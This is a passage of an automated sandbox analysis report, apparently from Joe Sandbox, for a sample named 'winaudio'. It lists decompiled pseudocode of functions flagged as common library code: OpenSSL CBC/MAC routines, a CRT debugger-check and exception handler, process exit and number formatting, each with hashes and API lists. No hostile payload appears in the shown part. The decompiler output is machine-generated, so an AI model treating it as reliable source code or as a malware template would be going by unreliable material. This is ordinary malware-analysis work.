											_t414 = _t414 + 0x20;
										} while (_t414 < _t439);
										_a8( &_a160,  &_a456);
										_t560 = _t566 + 8;
									}
									if(_a7 == 0) {
										E0037E1A0(_t533,  &_a376, 0, _t544);
										_t472 = _a12;
										_t560 = _t560 + 0xc;
										 *(_t560 + _t544 + 0x180) = _t472;
										 *((char*)(_t560 + _t544 + 0x183)) = _t472 >> 0x18;
										 *((char*)(_t560 + _t544 + 0x182)) = _t472 >> 0x10;
										_t296 = _t472 >> 8;
										__eflags = _t296;
										 *(_t560 + _t544 + 0x181) = _t296;
									} else {
										_t98 = _t544 - 4; // -4
										E0037E1A0(_t533,  &_a376, 0, _t98);
										_t500 = _a12;
										_t560 = _t560 + 0xc;
										 *(_t560 + _t544 + 0x187) = _t500;
										 *((char*)(_t560 + _t544 + 0x184)) = _t500 >> 0x18;
										 *((char*)(_t560 + _t544 + 0x185)) = _t500 >> 0x10;
										 *((char*)(_t560 + _t544 + 0x186)) = _t500 >> 8;
									}
									if(_t533 == 0) {
										L49:
										E0037E1A0(_t533,  &_a392, 0, 0x40);
										_t561 = _t560 + 0xc;
										_t473 = _a48;
										_t300 = _a40 + _t473;
										_a100 = _t300;
										if(_t473 > _t300) {
											_t545 = _a24;
										} else {
											_t328 = _a68;
											_a40 = _t328 >> 0x1f;
											_a16 = _t328 + 1 >> 0x1f;
											_a92 = _t439 - _t544;
											_t521 =  ~_t328;
											_a96 = _t561 + _t328 + 0x2d8;
											_a104 = _t521;
											_a68 =  &_a376 + _t544 - _t439;
											asm("o16 nop [eax+eax]");
											do {
												_t548 = 0;
												_t447 =  ~((_t473 ^ _a84) - 0x00000001 >> 0x0000001f &  !(_t473 ^ _a84) >> 0x0000001f);
												_a52 = _t447;
												_t480 =  ~((_t473 ^ _a88) - 0x00000001 >> 0x0000001f &  !(_t473 ^ _a88) >> 0x0000001f);
												_a56 = _t480;
												_a23 =  !_t480 | _t447;
												_t483 = _t521;
												asm("movd xmm0, eax");
												asm("punpcklbw xmm0, xmm0");
												asm("punpcklwd xmm0, xmm0");
												asm("pshufd xmm0, xmm0, 0x0");
												asm("movaps [esp+0xa0], xmm0");
												_a28 = _t483;
												_a12 = _a68;
												while(1) {
													_t522 = _a60;
													_a7 = 0;
													if(_t533 >= _t522) {
														goto L55;
													}
													L54:
													_t352 = _a44;
													L57:
													_a7 =  *((intOrPtr*)(_t352 + _t533));
													L58:
													_t533 = _t533 + 1;
													_t458 =  !(((_a28 - 0x00000001 >> 0x0000001f ^ _a16 | _t548 >> 0x0000001f ^ _a16) ^ _t548 >> 0x0000001f) - 0x00000001 & _a52) & ( !(((_t483 >> 0x0000001f ^ _a40 | _t524 ^ _a40) ^ _t524) - 0x00000001 & 0x000000ff & _t447 & 0x000000ff) & _a7 | ((_t483 >> 0x0000001f ^ _a40 | _t524 ^ _a40) ^ _t524) - 0x00000001 & 0x000000ff & _t447 & 0x000000ff & 0x00000080) & _a23;
													if(_t548 >= _a92) {
														_t458 = _t458 &  !(_a56 & 0x000000ff) |  *_a12 & _a56 & 0x000000ff;
													}
													_t492 = _a28;
													_t548 = _t548 + 1;
													_a12 =  &(_a12[0]);
													 *(_a96 + _t492) = _t458;
													_t483 = _t492 + 1;
													_t439 = _a64;
													_a28 = _t483;
													if(_t548 < _t439) {
														_t447 = _a52;
														_t522 = _a60;
														_a7 = 0;
														if(_t533 >= _t522) {
															goto L55;
														}
														goto L58;
													}
													_a8( &_a160,  &_a712);
													_a32( &_a160,  &_a712);
													_t545 = _a24;
													_t561 = _t561 + 0x10;
													_t360 = 0;
													if(_t545 >= 0x20) {
														asm("movaps xmm2, [esp+0xa0]");
														_t497 = _t545 & 0xffffffe0;
														do {
															asm("movups xmm0, [esp+eax+0x198]");
															asm("movups xmm1, [esp+eax+0x2d8]");
															asm("pand xmm1, xmm2");
															asm("por xmm1, xmm0");
															asm("movups [esp+eax+0x198], xmm1");
															asm("movups xmm1, [esp+eax+0x2e8]");
															asm("movups xmm0, [esp+eax+0x1a8]");
															asm("pand xmm1, xmm2");
															asm("por xmm1, xmm0");
															asm("movups [esp+eax+0x1a8], xmm1");
															_t360 = _t360 + 0x20;
														} while (_t360 < _t497);
													}
													if(_t360 < _t545) {
														_t525 = _a56;
														do {
															 *(_t561 + _t360 + 0x198) =  *(_t561 + _t360 + 0x198) |  *(_t561 + _t360 + 0x2d8) & _t525;
															_t360 = _t360 + 1;
														} while (_t360 < _t545);
													}
													break;
													L55:
													__eflags = _t533 - _a28 + _t522;
													if(__eflags < 0) {
														_t352 = _a36 - _t522;
														__eflags = _t352;
														goto L57;
													}
													goto L58;
												}
												_t521 = _a104;
												_t473 = _a48 + 1;
												_a48 = _t473;
												_t599 = _t473 - _a100;
											} while (_t473 <= _a100);
										}
										E002E65D0( &_a120);
										_t305 = E002E61B0(_t599,  &_a120,  *_a80, 0);
										_t562 = _t561 + 0x10;
										if(_t305 <= 0) {
											L75:
											E002E6370(_t439, _t503, _t533,  &_a120);
											_t560 = _t562 + 4;
											goto L76;
										} else {
											if(_a40 == 0) {
												asm("movaps xmm1, [0x3b9390]");
												_t308 = 0;
												__eflags = 0;
												do {
													asm("movups xmm0, [esp+eax+0x1d8]");
													asm("pxor xmm0, xmm1");
													asm("movups [esp+eax+0x1d8], xmm0");
													asm("movups xmm0, [esp+eax+0x1e8]");
													asm("pxor xmm0, xmm1");
													asm("movups [esp+eax+0x1e8], xmm0");
													_t308 = _t308 + 0x20;
													__eflags = _t308 - _t439;
												} while (_t308 < _t439);
												_push(_t439);
												_push( &_a456);
												_t310 =  &_a120;
												E002E6360(_t310);
												_t562 = _t562 + 0xc;
												__eflags = _t310;
												if(_t310 <= 0) {
													goto L75;
												} else {
													_push(_t545);
													_push( &_a392);
													_t312 =  &_a120;
													E002E6360(_t312);
													_t562 = _t562 + 0xc;
													__eflags = _t312;
													if(_t312 <= 0) {
														goto L75;
													} else {
														goto L81;
													}
												}
											} else {
												_t533 = _a72;
												E0037E1A0(_t533,  &_a456, 0x5c, _t533);
												_push(_a36);
												_t323 =  &_a120;
												_push(_a76);
												E002E6360(_t323);
												_t562 = _t562 + 0x18;
												if(_t323 <= 0) {
													goto L75;
												} else {
													_push(_t533);
													_push( &_a456);
													_t325 =  &_a120;
													E002E6360(_t325);
													_t562 = _t562 + 0xc;
													if(_t325 <= 0) {
														goto L75;
													} else {
														_push(_t545);
														_push( &_a392);
														_t327 =  &_a120;
														E002E6360(_t327);
														_t562 = _t562 + 0xc;
														if(_t327 > 0) {
															L81:
															E002E60E0( &_a120, _a108,  &_a116);
															_t474 = _a112;
															_t563 = _t562 + 0xc;
															__eflags = _t474;
															if(_t474 != 0) {
																 *_t474 = _a116;
															}
															E002E6370(_t439, _t503, _t533,  &_a120);
															_pop(_t546);
															__eflags = _a844 ^ _t563 + 0x00000004;
															return E002E056D(_a844 ^ _t563 + 0x00000004, _t503, _t546);
														} else {
															goto L75;
														}
													}
												}
											}
										}
									} else {
										if(_a40 == 0) {
											_t499 = _a44;
											asm("movq xmm0, [ecx]");
											_a592 =  *((intOrPtr*)(_t499 + 8));
											_a596 =  *((intOrPtr*)(_t499 + 0xc));
											_t149 = _t439 - 0xd; // 0x73
											asm("movq [esp+0x260], xmm0");
											E0037E340( &_a597, _a36, _t149);
											_a8( &_a160,  &_a584);
											_t374 = _t533;
											_t375 = _t374 / _t439;
											_t503 = _t374 % _t439;
											_t560 = _t560 + 0x14;
											__eflags = _t375 - 1;
											if(_t375 > 1) {
												_t160 = _t375 - 1; // -1
												_t535 = _t160;
												_t551 = _a36 + 0xfffffff3 + _t439;
												__eflags = _t551;
												do {
													_a8( &_a160, _t551);
													_t560 = _t560 + 8;
													_t551 = _t551 + _t439;
													_t535 = _t535 - 1;
													__eflags = _t535;
												} while (_t535 != 0);
												goto L48;
											}
											goto L49;
										} else {
											_t378 = _a60;
											if(_t378 <= _t439) {
												goto L76;
											} else {
												_a12 = _t378 - _t439;
												_a8( &_a160, _a44);
												E0037E340( &_a584, _a44 + _t439, _a12);
												E0037E340( &_a584 + _a12, _a36, _t439 - _a12);
												_a8( &_a160,  &_a584);
												_t394 = _t533;
												_t503 = _t394 % _t439;
												_t560 = _t560 + 0x28;
												_t396 = _t394 / _t439 - 1;
												if(_t396 > 1) {
													_t140 = _t396 - 1; // -2
													_t536 = _t140;
													_t554 = _a36 - _a12 + _t439;
													do {
														_a8( &_a160, _t554);
														_t560 = _t560 + 8;
														_t554 = _t554 + _t439;
														_t536 = _t536 - 1;
													} while (_t536 != 0);
													L48:
													_t544 = _a16;
													_t533 = _a28;
												}
												goto L49;
											}
										}
									}
								}
							}
						}
					}
				}
			}



















































































                        0x00372580
                        0x00372580
                        0x00372583
                        0x0037258b
                        0x00372590
                        0x00372597
                        0x0037259e
                        0x003725a8
                        0x003725b0
                        0x003725b4
                        0x003725bd
                        0x003725c0
                        0x003725c8
                        0x003725cc
                        0x003725d4
                        0x003725db
                        0x003725df
                        0x003725e3
                        0x003725eb
                        0x003725ef
                        0x003725f4
                        0x00372605
                        0x0037260a
                        0x0037260a
                        0x00372617
                        0x0037261c
                        0x0037261f
                        0x00372624
                        0x003726e2
                        0x003726e2
                        0x003726e7
                        0x00372786
                        0x0037278b
                        0x0037278e
                        0x00372790
                        0x00000000
                        0x00372796
                        0x00372796
                        0x00000000
                        0x00372796
                        0x003726ed
                        0x003726ed
                        0x003726ed
                        0x003726f0
                        0x0037276a
                        0x0037276f
                        0x00372772
                        0x00372774
                        0x00000000
                        0x0037277a
                        0x0037277a
                        0x0037279b
                        0x0037279b
                        0x003727a0
                        0x003727a8
                        0x003727ad
                        0x003727b1
                        0x003727b5
                        0x00000000
                        0x003727b5
                        0x003726f2
                        0x003726f2
                        0x003726f5
                        0x0037273b
                        0x00372740
                        0x00372743
                        0x00372745
                        0x00000000
                        0x0037274b
                        0x0037274b
                        0x00372753
                        0x00372758
                        0x00000000
                        0x00372758
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003726f5
                        0x003726f0
                        0x0037262a
                        0x0037262a
                        0x003726b8
                        0x003726bd
                        0x003726c0
                        0x003726c2
                        0x00000000
                        0x003726c8
                        0x003726c8
                        0x003726d0
                        0x003726d5
                        0x00000000
                        0x003726d5
                        0x00372630
                        0x00372633
                        0x00372678
                        0x0037267d
                        0x00372680
                        0x00372682
                        0x00000000
                        0x00372688
                        0x00372688
                        0x0037268d
                        0x00372695
                        0x0037269d
                        0x003726a2
                        0x003726a6
                        0x00000000
                        0x003726a6
                        0x00372635
                        0x00372638
                        0x003726f7
                        0x00372706
                        0x0037270b
                        0x0037270e
                        0x00372710
                        0x00000000
                        0x00372716
                        0x00372716
                        0x0037271f
                        0x00372728
                        0x00372732
                        0x00372732
                        0x0037263e
                        0x00372646
                        0x0037264b
                        0x00372650
                        0x00372e02
                        0x00372e05
                        0x00372e18
                        0x00372656
                        0x00372656
                        0x0037265e
                        0x00372663
                        0x003727bd
                        0x003727bd
                        0x003727c2
                        0x003727c6
                        0x003727cb
                        0x003727cf
                        0x003727d3
                        0x003727db
                        0x003727dd
                        0x003727dd
                        0x003727eb
                        0x003727f8
                        0x00372805
                        0x0037280e
                        0x00372810
                        0x00372816
                        0x0037281a
                        0x0037281e
                        0x00372822
                        0x00372826
                        0x0037282c
                        0x00372835
                        0x0037283b
                        0x0037283e
                        0x00372842
                        0x00372849
                        0x0037284b
                        0x00372851
                        0x00372853
                        0x00372857
                        0x0037285b
                        0x0037285e
                        0x0037285e
                        0x00372866
                        0x0037286d
                        0x00372871
                        0x0037287b
                        0x00372889
                        0x0037288e
                        0x00372891
                        0x00372894
                        0x00372899
                        0x003728aa
                        0x003728af
                        0x003728b2
                        0x003728b2
                        0x003728c2
                        0x003728c7
                        0x003728ce
                        0x003728d1
                        0x003728d3
                        0x003728d3
                        0x003728db
                        0x003728df
                        0x003728e7
                        0x003728ef
                        0x003728f3
                        0x003728fb
                        0x003728fe
                        0x00372912
                        0x00372916
                        0x00372916
                        0x0037291e
                        0x00372972
                        0x00372977
                        0x0037297b
                        0x00372980
                        0x0037298a
                        0x00372996
                        0x0037299f
                        0x0037299f
                        0x003729a2
                        0x00372920
                        0x00372920
                        0x0037292e
                        0x00372933
                        0x00372937
                        0x0037293c
                        0x00372946
                        0x00372952
                        0x0037295e
                        0x0037295e
                        0x003729ab
                        0x00372aef
                        0x00372afb
                        0x00372b04
                        0x00372b07
                        0x00372b0b
                        0x00372b0d
                        0x00372b13
                        0x00372d4e
                        0x00372b19
                        0x00372b19
                        0x00372b22
                        0x00372b2c
                        0x00372b36
                        0x00372b4a
                        0x00372b4c
                        0x00372b52
                        0x00372b56
                        0x00372b5a
                        0x00372b60
                        0x00372b62
                        0x00372b7b
                        0x00372b7d
                        0x00372b8e
                        0x00372b93
                        0x00372b9b
                        0x00372b9f
                        0x00372ba1
                        0x00372ba9
                        0x00372bad
                        0x00372bb1
                        0x00372bb6
                        0x00372bbe
                        0x00372bc2
                        0x00372bd4
                        0x00372bd4
                        0x00372bd8
                        0x00372bdf
                        0x00000000
                        0x00000000
                        0x00372be1
                        0x00372be1
                        0x00372bf6
                        0x00372bf9
                        0x00372bfd
                        0x00372c06
                        0x00372c4b
                        0x00372c53
                        0x00372c6a
                        0x00372c6a
                        0x00372c6c
                        0x00372c70
                        0x00372c75
                        0x00372c79
                        0x00372c7c
                        0x00372c7d
                        0x00372c81
                        0x00372c87
                        0x00372bd0
                        0x00372bd4
                        0x00372bd8
                        0x00372bdf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00372bdf
                        0x00372c9d
                        0x00372cb1
                        0x00372cb5
                        0x00372cb9
                        0x00372cbc
                        0x00372cc1
                        0x00372cc3
                        0x00372ccd
                        0x00372cd0
                        0x00372cd0
                        0x00372cd8
                        0x00372ce0
                        0x00372ce4
                        0x00372ce8
                        0x00372cf0
                        0x00372cf8
                        0x00372d00
                        0x00372d04
                        0x00372d08
                        0x00372d10
                        0x00372d13
                        0x00372cd0
                        0x00372d19
                        0x00372d1b
                        0x00372d20
                        0x00372d29
                        0x00372d30
                        0x00372d31
                        0x00372d20
                        0x00000000
                        0x00372be7
                        0x00372bec
                        0x00372bee
                        0x00372bf4
                        0x00372bf4
                        0x00000000
                        0x00372bf4
                        0x00000000
                        0x00372bee
                        0x00372d39
                        0x00372d3d
                        0x00372d3e
                        0x00372d42
                        0x00372d42
                        0x00372d4c
                        0x00372d5a
                        0x00372d6f
                        0x00372d74
                        0x00372d79
                        0x00372df2
                        0x00372dfa
                        0x00372dff
                        0x00000000
                        0x00372d7b
                        0x00372d7f
                        0x00372e19
                        0x00372e20
                        0x00372e20
                        0x00372e22
                        0x00372e22
                        0x00372e2a
                        0x00372e2e
                        0x00372e36
                        0x00372e3e
                        0x00372e42
                        0x00372e4a
                        0x00372e4d
                        0x00372e4d
                        0x00372e51
                        0x00372e59
                        0x00372e5a
                        0x00372e62
                        0x00372e67
                        0x00372e6a
                        0x00372e6c
                        0x00000000
                        0x00372e6e
                        0x00372e6e
                        0x00372e76
                        0x00372e77
                        0x00372e7f
                        0x00372e84
                        0x00372e87
                        0x00372e89
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00372e89
                        0x00372d85
                        0x00372d85
                        0x00372d94
                        0x00372d99
                        0x00372d9c
                        0x00372da3
                        0x00372da8
                        0x00372dad
                        0x00372db2
                        0x00000000
                        0x00372db4
                        0x00372db4
                        0x00372dbc
                        0x00372dbd
                        0x00372dc5
                        0x00372dca
                        0x00372dcf
                        0x00000000
                        0x00372dd1
                        0x00372dd1
                        0x00372dd9
                        0x00372dda
                        0x00372de2
                        0x00372de7
                        0x00372dec
                        0x00372e8f
                        0x00372ea6
                        0x00372eab
                        0x00372eb2
                        0x00372eb5
                        0x00372eb7
                        0x00372ec0
                        0x00372ec0
                        0x00372eca
                        0x00372edf
                        0x00372ee1
                        0x00372eeb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00372dec
                        0x00372dcf
                        0x00372db2
                        0x00372d7f
                        0x003729b1
                        0x003729b5
                        0x00372a61
                        0x00372a68
                        0x00372a6c
                        0x00372a76
                        0x00372a7d
                        0x00372a8c
                        0x00372a96
                        0x00372aab
                        0x00372ab1
                        0x00372ab3
                        0x00372ab3
                        0x00372ab5
                        0x00372ab8
                        0x00372abb
                        0x00372ac1
                        0x00372ac1
                        0x00372ac7
                        0x00372ac7
                        0x00372ad0
                        0x00372ad9
                        0x00372add
                        0x00372ae0
                        0x00372ae2
                        0x00372ae2
                        0x00372ae2
                        0x00000000
                        0x00372ad0
                        0x00000000
                        0x003729bb
                        0x003729bb
                        0x003729c1
                        0x00000000
                        0x003729c7
                        0x003729cd
                        0x003729d9
                        0x003729f0
                        0x00372a0c
                        0x00372a21
                        0x00372a27
                        0x00372a29
                        0x00372a2b
                        0x00372a2e
                        0x00372a32
                        0x00372a3c
                        0x00372a3c
                        0x00372a43
                        0x00372a45
                        0x00372a4e
                        0x00372a52
                        0x00372a55
                        0x00372a57
                        0x00372a57
                        0x00372ae7
                        0x00372ae7
                        0x00372aeb
                        0x00372aeb
                        0x00000000
                        0x00372a32
                        0x003729c1
                        0x003729b5
                        0x003729ab
                        0x00372650
                        0x00372638
                        0x00372633
                        0x0037262a

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: ($.\ssl\s3_cbc.c$data_plus_mac_plus_padding_size < 1024 * 1024$mac_secret_length <= sizeof(hmac_pad)
                        • API String ID: 0-997097701
                        • Opcode ID: 21e0f9291757b1299c45551440c9f03b5dc36fdb6a63ea84accfe2396f25e95a
                        • Instruction ID: 8ef9699de97cef7e415c2a9c450d3d09163572b66febcae39eb0242fac74b614
                        • Opcode Fuzzy Hash: 21e0f9291757b1299c45551440c9f03b5dc36fdb6a63ea84accfe2396f25e95a
                        • Instruction Fuzzy Hash: AF429F719183848BD721DF68C885B9BB7E8BF99304F448A2EF98DD7212E735D644CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037F7A7 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E0037F7A7(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x3e1008; // 0x847b54ee
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E002E1012(_t41);
					_pop(_t62);
				}
				E0037E1A0(_t67,  &_v804, 0, 0x50);
				E0037E1A0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E002E1012(_t57);
				}
				return E002E056D(_v8 ^ _t70, _t66, _t69);
			}




































                        0x0037f7a7
                        0x0037f7a7
                        0x0037f7a7
                        0x0037f7a7
                        0x0037f7b2
                        0x0037f7b7
                        0x0037f7b9
                        0x0037f7c1
                        0x0037f7c3
                        0x0037f7c6
                        0x0037f7cb
                        0x0037f7cb
                        0x0037f7d7
                        0x0037f7ea
                        0x0037f7f8
                        0x0037f7fe
                        0x0037f804
                        0x0037f80a
                        0x0037f810
                        0x0037f816
                        0x0037f81c
                        0x0037f822
                        0x0037f828
                        0x0037f82e
                        0x0037f835
                        0x0037f83c
                        0x0037f843
                        0x0037f84a
                        0x0037f851
                        0x0037f858
                        0x0037f859
                        0x0037f862
                        0x0037f868
                        0x0037f86b
                        0x0037f871
                        0x0037f87e
                        0x0037f887
                        0x0037f890
                        0x0037f899
                        0x0037f8a7
                        0x0037f8a9
                        0x0037f8be
                        0x0037f8ca
                        0x0037f8cd
                        0x0037f8d2
                        0x0037f8e1

                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0037F89F
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0037F8A9
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0037F8B6
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: ab639bc65b36c0e9ddfcdab1b5eb99da6e3cb8016d7e6b387e6ff18ba6890bc0
                        • Instruction ID: 7e5931f5f835df4825967d25947074ff34d6124c22c64d73241c6ea7ecfa9135
                        • Opcode Fuzzy Hash: ab639bc65b36c0e9ddfcdab1b5eb99da6e3cb8016d7e6b387e6ff18ba6890bc0
                        • Instruction Fuzzy Hash: D631E57594121CABCB21DF69DC8979DBBB8BF08310F5085EAE80CA7251E7749F818F45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00383DA2 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00383DA2(int _a4) {
				void* _t14;
				void* _t16;
				void* _t17;

				if(E0038DF30(_t14, _t16, _t17) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00383E27(_t14, _a4);
				ExitProcess(_a4);
			}






                        0x00383dae
                        0x00383dca
                        0x00383dca
                        0x00383dd3
                        0x00383ddc

                        APIs
                        • GetCurrentProcess.KERNEL32(00000003,?,00383D78,00000003,003DF610,0000000C,00383ECF,00000003,00000002,00000000,?,0038B8FE,00000003), ref: 00383DC3
                        • TerminateProcess.KERNEL32(00000000,?,00383D78,00000003,003DF610,0000000C,00383ECF,00000003,00000002,00000000,?,0038B8FE,00000003), ref: 00383DCA
                        • ExitProcess.KERNEL32 ref: 00383DDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: c89473d35d1697db1bf7c55043cc480a45ffa85c93aee29133e9119a4e5cb046
                        • Instruction ID: f138059bbcdf31e6a822973583c523719fe1e582635e1746126ed441e8776358
                        • Opcode Fuzzy Hash: c89473d35d1697db1bf7c55043cc480a45ffa85c93aee29133e9119a4e5cb046
                        • Instruction Fuzzy Hash: CBE0EC31110248EFCF13BF65DD49A593B6DEF90742F014055F9058A632CB76EE46DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002F64B0 Relevance: 4.1, Strings: 3, Instructions: 322COMMONLIBRARYCODECrypto
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E002F64B0(signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32, signed int _a56, signed int _a64, signed int _a68, signed int _a72, signed int _a76, signed int _a80, signed int _a84, intOrPtr _a88, intOrPtr _a92, signed int _a96, signed char _a100, intOrPtr _a108, intOrPtr _a112, signed int _a116) {
				signed int _v0;
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __esi;
				signed int _t214;
				intOrPtr _t219;
				signed char _t220;
				signed int _t223;
				signed int _t224;
				signed int _t232;
				signed int _t237;
				signed int _t242;
				signed int _t245;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t263;
				signed int _t264;
				signed int _t266;
				signed int _t269;
				char _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t302;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				void* _t319;
				signed int _t323;
				char* _t325;
				intOrPtr _t327;
				void* _t329;
				signed int _t330;
				signed int _t335;
				signed char _t340;
				char* _t341;
				intOrPtr* _t342;
				void* _t343;
				intOrPtr _t345;
				intOrPtr _t346;
				signed char _t351;
				signed int _t359;
				signed int _t367;
				signed int _t372;
				signed int _t377;
				void* _t378;
				signed int _t380;
				intOrPtr _t381;
				signed int _t383;
				signed int _t385;
				signed int _t387;
				signed int _t390;
				signed int _t397;
				intOrPtr _t398;
				void* _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				void* _t409;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				void* _t419;
				intOrPtr* _t420;
				void* _t421;
				signed int _t427;
				void* _t428;
				void* _t429;
				signed int _t433;
				signed int _t434;
				void* _t435;
				void* _t436;
				void* _t440;
				signed int _t441;
				signed int _t442;
				signed int _t447;
				signed int _t455;
				signed int _t458;

				_t335 = __ecx;
				E00397C10();
				_t214 =  *0x3e1008; // 0x847b54ee
				_a76 = _t214 ^ _t447;
				_t372 = 0;
				asm("movsd xmm3, [esp+0x64]");
				asm("xorps xmm0, xmm0");
				_a24 = _a88;
				_a28 = _a92;
				_a32 = _a96;
				_t219 = _a112;
				_a8 = 0;
				_t414 =  >=  ? _t219 : 6;
				_t220 = _a116;
				asm("comisd xmm0, xmm3");
				_a4 = _a84;
				if(_t219 <= 0) {
					__eflags = _t220 & 0x00000002;
					if((_t220 & 0x00000002) == 0) {
						__eflags = _t220 & 0x00000004;
						_t372 =  !=  ? 0x20 : 0;
						_a12 = _t372;
					} else {
						_a12 = 0x2b;
					}
				} else {
					asm("xorps xmm3, [0x3b1f90]");
					_a12 = 0x2d;
				}
				asm("movsd xmm2, [0x3b1f80]");
				asm("movsd xmm4, [0x3b1f88]");
				asm("cvttsd2si ecx, xmm3");
